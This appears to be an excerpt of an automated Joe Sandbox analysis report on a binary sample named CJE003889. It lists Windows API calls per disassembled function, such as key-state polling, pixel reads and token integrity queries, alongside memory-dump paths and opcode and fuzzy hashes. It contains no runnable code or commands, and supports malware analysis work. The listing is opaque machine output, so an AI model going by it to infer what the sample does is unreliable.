                                                            • Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
                                                            • Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC
                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00CCE6AC
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00CCE6B4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1389676194-0
                                                          • Opcode ID: 079056fa8efc82eb523a3564edd202f30ad54f3d46e03fbf40a8e10230cea8dc
                                                          • Instruction ID: bb7d06a529177bd0ec257c75af9eb8be0ea691b0e621eb7e2e04ffb30548ce42
                                                          • Opcode Fuzzy Hash: 079056fa8efc82eb523a3564edd202f30ad54f3d46e03fbf40a8e10230cea8dc
                                                          • Instruction Fuzzy Hash: B251FA35A00109DFCB11EF64C981AAEBBF9EF09314F1480A9E959AB361CB31ED15DB50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5d48b2e3dd5d00e83af7788bd4775d4d29f28581aa17001e65fe04d5a1f5583c
                                                          • Instruction ID: 5edf643a0d006879e1137dd1bd4a8bba4756f1900b7d799babd6599c8c3f33c6
                                                          • Opcode Fuzzy Hash: 5d48b2e3dd5d00e83af7788bd4775d4d29f28581aa17001e65fe04d5a1f5583c
                                                          • Instruction Fuzzy Hash: 3D41E635904284EFD720DF2ADC88FADBBA8EB09310F154165F826E72E0C770BE41DA61
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 00C62357
                                                          • ScreenToClient.USER32(00D257B0,?), ref: 00C62374
                                                          • GetAsyncKeyState.USER32(00000001), ref: 00C62399
                                                          • GetAsyncKeyState.USER32(00000002), ref: 00C623A7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: AsyncState$ClientCursorScreen
                                                          • String ID:
                                                          • API String ID: 4210589936-0
                                                          • Opcode ID: d2a3b8fd80a51f2f0093af1f4fc3bb0e93f2b896fd1bb3454b050f2ec2823c6d
                                                          • Instruction ID: b19084c1404a34425962354787c4a6b5d4594a347574a6e11bfcb7dbb4cae4ec
                                                          • Opcode Fuzzy Hash: d2a3b8fd80a51f2f0093af1f4fc3bb0e93f2b896fd1bb3454b050f2ec2823c6d
                                                          • Instruction Fuzzy Hash: FD418435604605FBDF259F69C888AEDBB78FB05360F20436AF835962A0C7349E50EF91
                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CB63E7
                                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 00CB6433
                                                          • TranslateMessage.USER32(?), ref: 00CB645C
                                                          • DispatchMessageW.USER32(?), ref: 00CB6466
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CB6475
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                          • String ID:
                                                          • API String ID: 2108273632-0
                                                          • Opcode ID: 9e1f433487ce32c595cdf4b2ec4325cde6b0dc8358e708307e3613092aa891c4
                                                          • Instruction ID: 95205790176fee218ffdd545b0318e2585f2d7924827d8b5bc8f5edb9334e094
                                                          • Opcode Fuzzy Hash: 9e1f433487ce32c595cdf4b2ec4325cde6b0dc8358e708307e3613092aa891c4
                                                          • Instruction Fuzzy Hash: A7319231540B569FDB24CFB0D844FEA7BA8AB11314F140179E425C71A0E7799946DB60
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 00CB8A30
                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00CB8ADA
                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00CB8AE2
                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 00CB8AF0
                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00CB8AF8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleep$RectWindow
                                                          • String ID:
                                                          • API String ID: 3382505437-0
                                                          • Opcode ID: 1936dee6b2df4b9574fe5dd0441233903f779139b7cfd62bd82ed6e47de645dc
                                                          • Instruction ID: 59653d21fa068d3d6666dbe3e86df95a777e8af92949c459bb8e59f35a86ce06
                                                          • Opcode Fuzzy Hash: 1936dee6b2df4b9574fe5dd0441233903f779139b7cfd62bd82ed6e47de645dc
                                                          • Instruction Fuzzy Hash: 0F31B171500259EBDF14CFA8DD8CBDE7BB9EB05315F108229F925EA1D0C7B09A14DB90
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00CBB204
                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00CBB221
                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00CBB259
                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00CBB27F
                                                          • _wcsstr.LIBCMT ref: 00CBB289
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                          • String ID:
                                                          • API String ID: 3902887630-0
                                                          • Opcode ID: ecd7caf565ebe08ee51bb4a9cbca2e7f5b60d8aadecc5bc1eb0983d24aa8663a
                                                          • Instruction ID: 699c389cdf91d722f5b042d85c94a52d066e6baadb5ff0ce88e4e24e4f69bf95
                                                          • Opcode Fuzzy Hash: ecd7caf565ebe08ee51bb4a9cbca2e7f5b60d8aadecc5bc1eb0983d24aa8663a
                                                          • Instruction Fuzzy Hash: 7621D0322042447BEB25AB79DC49ABF7BACDF49720F10413DF805DA1A1EBA19D41A3A1
                                                          APIs
                                                            • Part of subcall function 00C62612: GetWindowLongW.USER32(?,000000EB), ref: 00C62623
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00CEB192
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00CEB1B7
                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00CEB1CF
                                                          • GetSystemMetrics.USER32(00000004), ref: 00CEB1F8
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00CD0E90,00000000), ref: 00CEB216
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$MetricsSystem
                                                          • String ID:
                                                          • API String ID: 2294984445-0
                                                          • Opcode ID: b5d2bbf768315dac71e7e730822d3c787ad5c444d1fa3d097c13eabf0db5fe88
                                                          • Instruction ID: 427d3e36c610d94fb0f112ddfe176f4c961d49927c2cc2e32e8a7b72a576d578
                                                          • Opcode Fuzzy Hash: b5d2bbf768315dac71e7e730822d3c787ad5c444d1fa3d097c13eabf0db5fe88
                                                          • Instruction Fuzzy Hash: 9C217C71A106A1AFCB209F3A9C44B7F7BA4EB15331F104628BA32D72E0E7309D119B90
                                                          APIs
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CB9320
                                                            • Part of subcall function 00C67BCC: _memmove.LIBCMT ref: 00C67C06
                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CB9352
                                                          • __itow.LIBCMT ref: 00CB936A
                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CB9392
                                                          • __itow.LIBCMT ref: 00CB93A3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$__itow$_memmove
                                                          • String ID:
                                                          • API String ID: 2983881199-0
                                                          • Opcode ID: 22a9bbfb1739616b4a4f4d8d41af34f8e97ac9754ca8c3c096394c532b9e59a8
                                                          • Instruction ID: ae841ec43dc41cb2f913cf93c1bf76958e6e9f384486d7bf42079bb153382b9a
                                                          • Opcode Fuzzy Hash: 22a9bbfb1739616b4a4f4d8d41af34f8e97ac9754ca8c3c096394c532b9e59a8
                                                          • Instruction Fuzzy Hash: FD21D735700248BBDB20AA658CC5EEE7BFDEF88714F044029FA45DB1E1D6B0CE459791
                                                          APIs
                                                          • IsWindow.USER32(00000000), ref: 00CD5A6E
                                                          • GetForegroundWindow.USER32 ref: 00CD5A85
                                                          • GetDC.USER32(00000000), ref: 00CD5AC1
                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 00CD5ACD
                                                          • ReleaseDC.USER32(00000000,00000003), ref: 00CD5B08
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Window$ForegroundPixelRelease
                                                          • String ID:
                                                          • API String ID: 4156661090-0
                                                          • Opcode ID: 03058e5a0a6f63a287d8086d0674df53fdfba309254db58b9eace55944e515a5
                                                          • Instruction ID: 1a09a16271cae136fac44509d051509c00c59dc7f4e8d50330bd00beba209623
                                                          • Opcode Fuzzy Hash: 03058e5a0a6f63a287d8086d0674df53fdfba309254db58b9eace55944e515a5
                                                          • Instruction Fuzzy Hash: 77219F75A00114AFDB10EF65D8C4BAEBBE9EF48310F14807DF90997362CA30AD41DB90
                                                          APIs
                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C6134D
                                                          • SelectObject.GDI32(?,00000000), ref: 00C6135C
                                                          • BeginPath.GDI32(?), ref: 00C61373
                                                          • SelectObject.GDI32(?,00000000), ref: 00C6139C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ObjectSelect$BeginCreatePath
                                                          • String ID:
                                                          • API String ID: 3225163088-0
                                                          • Opcode ID: c7daaa1a9cacc4fab182aee48038e872a84a86e58a2f0fe16f32dec1b67232e5
                                                          • Instruction ID: d2f631ea4f03b4a8ce108c4cfc4c292477533d05035eb02a5d62228a5130cbdb
                                                          • Opcode Fuzzy Hash: c7daaa1a9cacc4fab182aee48038e872a84a86e58a2f0fe16f32dec1b67232e5
                                                          • Instruction Fuzzy Hash: AC213370800705EBDB319F25ED85B6DBBE4EB10322F5C4225F811D62B4D7B19952DF60
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID:
                                                          • API String ID: 2931989736-0
                                                          • Opcode ID: 81e3b2f35a152bb6f261ee0812feaeb0bfe573b1f8b6ce5eaf7b8dccd2bbb0b0
                                                          • Instruction ID: d7dbb6c407ed68e1f4c130921c674eb45c939740802de5fa3b7a463336d6e098
                                                          • Opcode Fuzzy Hash: 81e3b2f35a152bb6f261ee0812feaeb0bfe573b1f8b6ce5eaf7b8dccd2bbb0b0
                                                          • Instruction Fuzzy Hash: 5301B5716011197BE604AB169D42FFBB75CDE50388F084021FE1596346EB90EE1192E5
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 00CC4ABA
                                                          • __beginthreadex.LIBCMT ref: 00CC4AD8
                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00CC4AED
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00CC4B03
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00CC4B0A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                          • String ID:
                                                          • API String ID: 3824534824-0
                                                          • Opcode ID: 1249337f627fbce3ebb5c42367b8feb5fb09c60dae0704d6edfa959414f57eac
                                                          • Instruction ID: 4c74262a00a605500b058c6d3b7aad8f047e0c5750e6abb8b1bc3d557bc4a1be
                                                          • Opcode Fuzzy Hash: 1249337f627fbce3ebb5c42367b8feb5fb09c60dae0704d6edfa959414f57eac
                                                          • Instruction Fuzzy Hash: 3E11E176904658FFCB159BA8EC58F9E7BACAB45320F14826DF824D3390D6718E0187A0
                                                          APIs
                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CB821E
                                                          • GetLastError.KERNEL32(?,00CB7CE2,?,?,?), ref: 00CB8228
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00CB7CE2,?,?,?), ref: 00CB8237
                                                          • HeapAlloc.KERNEL32(00000000,?,00CB7CE2,?,?,?), ref: 00CB823E
                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00CB8255
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 842720411-0
                                                          • Opcode ID: d04bca6dab2da0132499d63fed203a535bc311dc1f7011a59195a7549f6cda94
                                                          • Instruction ID: 2f9d23ef765fc9e7352a6987262c0d4412db716633e91781f40ad2c95cc832f6
                                                          • Opcode Fuzzy Hash: d04bca6dab2da0132499d63fed203a535bc311dc1f7011a59195a7549f6cda94
                                                          • Instruction Fuzzy Hash: 5F016971200249BFDB204FA6DC88EAF7BACEF8A754B50442DF859C6260DA318D05CA60
                                                          APIs
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CB7044,80070057,?,?,?,00CB7455), ref: 00CB7127
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CB7044,80070057,?,?), ref: 00CB7142
                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CB7044,80070057,?,?), ref: 00CB7150
                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CB7044,80070057,?), ref: 00CB7160
                                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CB7044,80070057,?,?), ref: 00CB716C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                          • String ID:
                                                          • API String ID: 3897988419-0
                                                          • Opcode ID: 808b9d18f3d46002714559ab021327ced5dcd32b242ce19f44163fc66fea26d2
                                                          • Instruction ID: a78300105eb3281b4de9c48d437b5f4ebfdbacac2b7b79d599d69a3c13c76b03
                                                          • Opcode Fuzzy Hash: 808b9d18f3d46002714559ab021327ced5dcd32b242ce19f44163fc66fea26d2
                                                          • Instruction Fuzzy Hash: 0A0184B2601204BBDB114F68DC84BAE7BBDEF85751F144168FD08D6220D771DE4197A0
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CC5260
                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00CC526E
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CC5276
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00CC5280
                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CC52BC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                          • String ID:
                                                          • API String ID: 2833360925-0
                                                          • Opcode ID: 88c30ed860a565e7f2d757a7786dced8f01852b3fe39d33622f754f106543512
                                                          • Instruction ID: 70286b830a3f79b2ad2895c0849c415d6c0b456c2e1640d104c2b1dd892ad5c1
                                                          • Opcode Fuzzy Hash: 88c30ed860a565e7f2d757a7786dced8f01852b3fe39d33622f754f106543512
                                                          • Instruction Fuzzy Hash: E8011B31D01A1DDBDF00DFE5E889BEDBBB8BB09711F400159E945F6150CB30659187A1
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00CB8121
                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00CB812B
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CB813A
                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00CB8141
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CB8157
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: c934915195d73f31248e80db5582507a6cda48ef939c19a1b0a3bca7134031e5
                                                          • Instruction ID: 799ce752d8b59ee35ca461e06582e97bd8cb14481da05154ec46aa57d75455ee
                                                          • Opcode Fuzzy Hash: c934915195d73f31248e80db5582507a6cda48ef939c19a1b0a3bca7134031e5
                                                          • Instruction Fuzzy Hash: 3AF06871201344AFD7110F65DCC8FAF3BACFF85754F000029F545D6150CB619E46DA60
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00CBC1F7
                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00CBC20E
                                                          • MessageBeep.USER32(00000000), ref: 00CBC226
